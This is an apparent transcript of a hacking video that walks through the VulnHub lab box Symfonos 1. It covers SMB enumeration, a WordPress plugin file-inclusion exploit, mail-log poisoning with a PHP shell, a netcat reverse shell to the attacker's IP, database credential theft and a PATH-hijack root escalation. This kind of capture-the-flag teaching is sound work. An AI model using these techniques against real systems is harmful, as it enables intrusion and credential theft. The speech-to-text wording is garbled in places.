Yeah, welcome. Today we're going to be doing Symfonos 3, or excuse me, Symfonos 1, not 3. And this is going to be on a Vuln Hub box. I don't think they have it on Proving Grounds, but this is one of the TJ Knoll OSCP-like boxes. They say it's OSCP-like, so we're going to check this out real quick. So let's first make a directory. Well, first we should probably do a ping sweep, which I do have a little script written for that, so I'm going to go ahead and use my script because it's a lot faster than NetDiscover and the mmap one. So if you want to do an mmap ping sweep though, it's mmap-sn and then a network. Alright. This is not connected to the internet, it's connected to, it's a Vuln Hub box, so I do have it on an internal network within VirtualBox there. So Kali and Symfonos are both connected to an internal network. And what we'll do is we'll go ahead and use my ping sweep guide I have. I believe that's going to be p sweep. Yep, 10, 10, 10. And we see dot 15 and dot 24 pops up. So let's go ahead and check ourselves out. And we are dot 15. Alright. If I were to do that with mmap, it would be an mmap-sn. The network, and then enter. And if I were to do it with NetDiscover, it would have just been NetDiscover. Sudo and NetDiscover. If I could type, make my life a lot easier. Yep, and then this guy will search through. And as you can see, we also found that dot 24. Now, NetDiscover will not show you your own IP address. It will only show you everybody else. So that is the one nice thing about NetDiscover. Let's go ahead and clear this though, and we'll stop this guy up here. And let's go ahead and make a directory for Symfonos1. We'll cd into that. Okay, and let's start up our mmap scan on 24. So it looks like we have port 22 SSH, port 25 SMTP. That's a different. All right, port 80 HTTP 139.445. So we do have some type of SMB. So let's go ahead and run a new for Linux down here for 10.10.10.24. And what we'll also run up here is a SMB client for 10.10.10.24, and let's see if we can get into it, and we do. So we can get into anonymous, it looks like. Let's go ahead and do an SMB client. Should just be 121. Let's try that. Oh, I'm not able to get in there. I think I need another. There we go. Try to get into here when we can. Let's do a dir, and we got that attention.txt. Let's go ahead and get that. Attention.txt. Alright, cool. And we'll exit out of here, and then we'll do a cat attention.txt. And we see, can users please stop using passwords like Apdico, Querte, and baseball. Okay, next person I find using one of these passwords will be fired. Alright, so we got password list, and I believe we also have some usernames that came back with this enum for Linux. We do have Helios. So we do have a Helios enumerated user SID. Okay, that's something that we might be able to use, like right there. Remember, we also have that port 80 we want to check out too, but we found Helios so far, so that's good. What else do we have here? Yep, we know that Helios is there. Okay, so I wonder if Helios, if we can use one of those 3 passwords on there. Okay, yep. So let's go ahead and try that. Let's go ahead and try doing SMB. What is that? SMB map, SMB client. I always forget what things like that are. I feel like that is an SMB client to actually be able to log in with a username and password. I think that that's SMB client, but I always forget what it is. So that doesn't really help out very much either. But let's try it with SMB client. SMB map. Okay, so SMB client. Actually, this is probably it, like right here. So just // 10.10.10.24 slash Helios, and then the username is Helios, right? The password, I'm going to try this guy first, then we'll try him, then we'll try baseball. We can also do it Hydra. Tac L for Helios, because that's the only username we found so far. Tac P, and we could have put this as a password list. So we could say, okay, let's go ahead and say nano pass.text, right? We could put this guy, QWERTY, and baseball in there, right? And then Control X, yes. And then from here to a Hydra, Helios, pass.text, and that's going to be for SMB, and that's going to be at 10.10.10.24 on port 445. I think we can use Hydra, and it says that finished attack, but I don't believe that at all. I think I just did it wrong, in all honesty. How do you use Hydra with SMB? Because you can use it with SMB. It's right there. Zero valid passwords found. I feel like that's a lie, but we're just going to go ahead and try them because we only have 3 passwords to try. I'll try QWERTY first, QWERTY, and that did work. Okay, cool. So QWERTY does work, and we can go ahead and get that research and get to do. And we'll have to look that up, that little thing to do the, how to Hydra or whatever in SMB. Only problem is, like I said, we are not connected to the internet right now on this machine, so maybe I'll look that up later on, and or look it up on your own. But yeah, you can use SMB for it. For some reason, it won't take pass.text. I don't know why, but we obviously did see that QWERTY does work. I wonder if I need to do something like 10.10.24 slash Helios. No, I don't know. Something like that. Is SMB? Yeah, I don't know. Okay. So we did get that research and to do that text. Let's go ahead and cat that research.text. God is studying Greek mythology. Okay. Ethiopia. Okay, that's just some research on actually Helios or whatever. So let's go ahead and cat to do.text. And we have bin watch Dexter, dance, and work on. Well, that's strange, like right there. That is definitely strange. Let's go ahead and check out what this is, like right here. That to me seems like we are now looking at the web interface. And we're going to start working on that. 10.10.10.24. Yeah, because we haven't even looked at this yet, huh? And the only thing we have is an image.jpg, which that shows me nothing, okay? So let's go ahead and throw that in there. And okay, cool. So we have what looks like a WordPress site. Yeah, it does. It is a WordPress site. Ooh, okay. It goes to Symfonos.logo. So you know what that means. We have to go to nano, sudo nano, etsy host, yep. And we're going to do 10.10.10.24 Symfonos, SYMFONOS. How do I spell that? SYMFONOS.local. Alright, so we do have to change that in Etsy host because it is looking for it up here. And we have a WP login.php. So let's go ahead and start some WP scans on this guy. WP scan, tech URL, HTTP, 10.10.10.24. And then we have that Helios thing like right there. And then we can do a tech enumerate users. We can also try to enumerate all plugins. We'll do that next. Enumerate all plugins. Looks like admin might be the only user on here. Admin. So Helios not a user on there. There's our WordPress version. Upload directory has listings enabled. Ooh, look at this. We have Site Editor 2019 and 2021. Which one are we using like right now is my question. We also have something called Site Editor. that plugin? WordPress version. Oh man, big yawn. Is that a plugin? No plugins found. Really? Huh, wow. Okay, so it's saying that I can't find any plugins. There's other things we can do because I did type in enumerate AP. We can also enumerate just P for just straight up, hey, we want to find some plugins here. We think some might exist. Alright. And it's saying no plugins found, but I mean, I'm finding one site editor like right here. Let's go and check out that site editor. It's called site editor, right? So let's go ahead and do a search plate for site editor. Yep. Now I just did this box and I got so far that I stopped. So this is kind of like a gray box kind of test. Now, first time I did this, I did find more plugins, and I did find what was it, Mail Masta also. So that's why I'm kind of confused that we're not finding anymore. I'm kind of like, huh, that's kind of weird. You know, like I only found one plugin, but since I just did this, I don't know, about 10 minutes ago, and I found 2 plugins or 3 plugins, something like that, and Mail Masta was one of the other plugins. Now, do we need that plugin? We do not. I wonder if I can do that one where it's, what's it, WP content, I think it is. Directory, then yeah, WP. So you can do like a tag WP content, and then WP just straight up content. There's something you can do like that too. I didn't put that last time though. And it's saying still no plugins found. That's really strange. Okay. I don't know why. Alright, but we did find that one, we think, site editor, we think it is. WordPress plugin site editor. And what version is this guy? Now I did my plugin, I actually found what version he was and everything. So this is really weird. Well, we'll try version 1.1.1, then we'll try version 2.2.2 after that, I guess. 1906. Oh, well, here's our images, so we know we're using 2019. So that's good. Can you do like a WP plugin or something like that? WP content. They could do something like WP plugins or something like that. Oh yeah, I forgot I'm not on the internet, am I? Alright, well, that's okay. Oh, that's definitely not it. Alright, so let's go ahead and we got that. We do have this guy right here, site editor. We'll go ahead and try 1.1.1.1, which is this guy. So we'll cat him. We'll see what this guy's all about. Oh, not the search exploit. Yeah, I think you do like attack Z or something. I don't know. I just always bring it back down to me. Let's go ahead and cat that 44340.txt. Let's see what this guy says. So he says a CV description, local file, inclusion vulnerability, vulnerable code. Alright, HTTPS, plugins, track, boom, boom. Should have a proof of concept here. We do. WP content, plugin, site editor, boom. All the way across / Etsy password. So if I put that in there and that works, then we can start to look at this. So from WP content, there we go. Helios over, Etsy password, and that does indeed work. Alright, so we got MySQL server running this thing. There's our Helios like right there. Alright, so that does work. So we know for a fact that we do have some type of local file inclusion. So cool, we can work with that, right? Let's go ahead and start to work with this. So we have local file inclusion, and now what the question is where can we go from here, right? We have to be able to upload something somehow, right? Now this one took me a minute, but then I remembered We have SMTP, right? So you can tell that into SMTP, and that's on port 25. Symfonos.local domain. Okay. Now we can send mail to and mail from. So we can mail from, please sub at overgrown-1.com. Okay. That's not a real thing. Mail from. And then we can do a respond to. I think it is. I think it's respond to, or it's mail to, or recipient to. Recipient to. Helios at Symfonos local domain. Symfonos.local domain. It should be something like that. HELIOS at Symfonos local domain. Okay. Now we sent him mail, and now what we need to do is send him our data. What do we actually want to send him, right? So what we're going to send him, if I go to my cat scripts, I should have some sort of a web shell thing in here. It's not those guys. PHP command execution address bar, that text. Exactly what that says. Exactly what it does. That does exactly what it says, okay? So I grab this guy right here. I'm going to throw him into the data. Put a period, enter, and that's it. Okay, we now have, we've now set that off. Okay. So now all we have to do is just know where is he going, right? So we know that SMTP exists. Where is our mail, right? So let's go ahead and CD in a var to see if it's in here. Mail. And I don't have anything in here. But what if there's a Helios in here? So couldn't we do a CD? So couldn't we get all the way back up to here, right? And we could do var mail Helios, right? All that. And that should be and command, because we just sent him a message, right? And command equals ID. Now what we have to do is see, did we actually get the ID? And we sure enough did, like right here. Okay, is this the prettiest way to do stuff? No, but here's our UID, like right here. Alright. So that's coming through. This is coming through, and it's hitting what we put, like right here. So this is working. Or it's not exit. Is it end? Is it just Control C? I forgot exit out of here all the time. I can do everything. Can't exit out of the damn thing. Quit. Okay. So we are able to get in there, right? We're able to send him information. Can we send him a netcat reverse listener? And if we do we have to URL encode it? So I already URL encoded it before. I'm going to try it without URL encoded this time. So let's just let the thing do it itself, right? Just go ahead and cat script. This is about how far I made it last time. We'll do a netcat reverse shell. Okay. So we have our reverse shell like right here. Netcat 4242 or NC tag LVMP 4242. Okay, so I have my NC tag E bin bash 10.10.10.15. That's my IP address, right? 4242. So that's my own IP address. I'm just gonna go ahead and throw that into here, or into command. Excuse me. And let's see if this works. If not, then we're just got the URL encode it. But that is hanging, and that did actually work. So the first time I did it, I opened up Burp Suite, did it from there to URL encode it, copy that, placed it back into the thing, and back in the URL bar. So we are Helios, okay. CD and share. Okay, cool. So we are now here. Can I CD in the root? I can. No, I cannot. Okay. So let's go ahead and do a which Python. See what we're running here. Let's go ahead and cat scripts full shell. Alright, so we're Helios right now. Let's go ahead and see what this guy can run. We don't know his password still, right? But let's go ahead and see some different things here. We did have SQL on here, right? We had an SQL server. So let's try that. MySQL, TAC-U, no, excuse me. Actually, you know what? Let's go to CD, var www HTML, because we have WordPress on here, right? So ls tac la, CD and whatever the heck that says. And we do have WP config on here. So let's go ahead and cat that. Cat that WP config file. And we have WordPress as the database user and password 123 as database password. So let's go ahead and do a MySQL. TAC-U WordPress. Oh. Alright. Password 123. And we're going to do a show databases. We have WordPress and information schema. Okay, so I guess use WordPress. Show tables. WP users. I guess we could always just try to grab information out of there. So let's go ahead. Select star from WP users. Oh, we got that now. We got the user login for admin. I mean, we might be able to crack that. And then if we could make a reverse shell with an admin, I think we would. No, we won't be under admin. But still be better than, you know, having nothing. So we might as well try. Let's nano hash.text. And let's go ahead and do John hash.text. And we'll do tac word list equals user share word list rocky.txt. Let's go ahead and try to crack that hash just to see what happens. And also from here, let's see, let's go ahead and exit out this guy, and let's go ahead and grab our SUID bits and everything, and also limpies too. So go ahead and copy Linux exploit suggester over. That sounds good. Privilege escalation also scripts, limpies. And we can also copy, or that could be it. Oh yeah, SUID bits. Cat scripts SUID lookup. We're going to throw a quick SUID lookup at it, see if we see anything out of the norm here. Damn, that was quick. I'm not used to it being this quick. Ping, status check. That's out of the norm, like right there, status check. And it's opt. I think that's actually a file. CD and opt. Yeah, that's a executable. Let's go ahead and see what that guy's doing. Let's go ahead and cat status check. Okay, let's go ahead and string status check. Alright, string status check. And what do we have here? Do we have anything cool inside this thing? 'Cause why would you be here? Alright, string status check. libc. It's got curl on here. Curling something. Localhost. So we have a GCC. Compiling something. Oof. Man, I have no idea what's actually happening here. I mean, I have kind of a clue of what's happening, but I don't understand how to use that to be able to go further. I mean, we have curl. So might be able to utilize that, you know, that curl, and then just have it download our curl script, but I don't know where it's actually going to be downloading that curl script from, you know what I'm saying? Like, I don't know how it's supposed to get that curl script. That's really what the problem is like right now, and we shall figure that out. Because we have curl tech IH, right? That's what it said. Yep, curl. So let's do this other with curl. Let's go ahead and start Python also. Yeah. And with that, I'm just gonna make it so it's easy to copy and paste. So I'm just gonna do a wget limpies.sh. CD and temp. Okay, then we'll do a wget should be Linux exploit suggester.sh. Okay, and that should be it for those two. So that was easy, quick way of doing that. Let me go ahead and exit off here, and we can go ahead and change both of those. Then we start to think about how we're gonna, if we have to exploit curl, how we're gonna do that. So I wonder if it has to do something like, oh man. Actually, just came up with an idea. I think we did something like this just the other day, actually. Oh, he couldn't find anything. Let's try to do it without the word list. I think we had an idea just like this just the other day. I think we did something like this, actually. So let me go ahead and hop back into this guy. Okay. Which... get that full shell going again. Well, type in which Python. Okay, so we had that opt cd to opt. Okay, now what we might be able to do is actually like cd into temp drive and then echo bin sh into curl. So this is what we're gonna do. We're gonna cd into temp. So we just did something like this just the other day. Echo bin sh into curl. Okay. And then from there, what we can do is we can change the mode for curl and then echo the path, right? And then echo path equals temp $path. You know what I'm talking about? So we can do a change mode 777 to curl. So we can echo path. It's path just like that, right? It's just echo path. All right. Now it's echo. What the heck am I doing? It's gonna be echo. That path. Okay. It's going to be echo path. Whoopsie daisy. Alright, echo path. And then it's going to be export path equals temp, then the path. So I'm actually going to actually do something with this. So it should be export path equals, and I believe it's temp. It's path equals slash temp. /temp that $ path. I think it goes just like that. And that should be it, like right there. Nano scripts. I don't know what I even want to call this thing. Export path for curl. I'll just copy this whole thing right in there. Don't mind me, I'm just going to copy this like real quick. Because this should be it, like right here. I didn't get any problems or anything like that. Then what I should have to do is just do a quick, let's actually make sure. Well, I have to go back into opt. But I should just have to go into opt and then run that status check. And that should be root. Because that should call for curl. From curl, that should then echo bin sh back to it and utilize the path and everything, And yeah, that should do it. See opt. So I should just be able to do a status check. ID. And sure enough, my EUID is indeed root. So let's go ahead and CD into root. And we have our proof.txt. So that is one of them, like right there, for Symfonos1. We will be having, I will be going through many more of these. What if I can actually, no, I'll be able to do that, never mind. But, yeah, I mean, that's about it. So, I will be doing many more of these OSCP like boxes and everything, and going through them and everything like that. We do have, let me see here. I have Symfonos2, Mercy, DGen, GoldenEye Healthcare, Coldbox Easy, which I've already done. And I think that that's about all of them that I have on here. Like right now, I know I have some more though. But yeah, so we will be going through these guys. Brain pan, you know, all those things. So if you guys want to see me do any that are supposedly OSCP like, just let me know. And yeah, we'll work on it and everything like that. And we'll try to get it, you know, up and running and stuff like that for you guys, and get everything to work and go through the whole thing. If you have any questions, as usual, leave them down in the comments. And that's about it. So thanks for tuning in for another hacking video.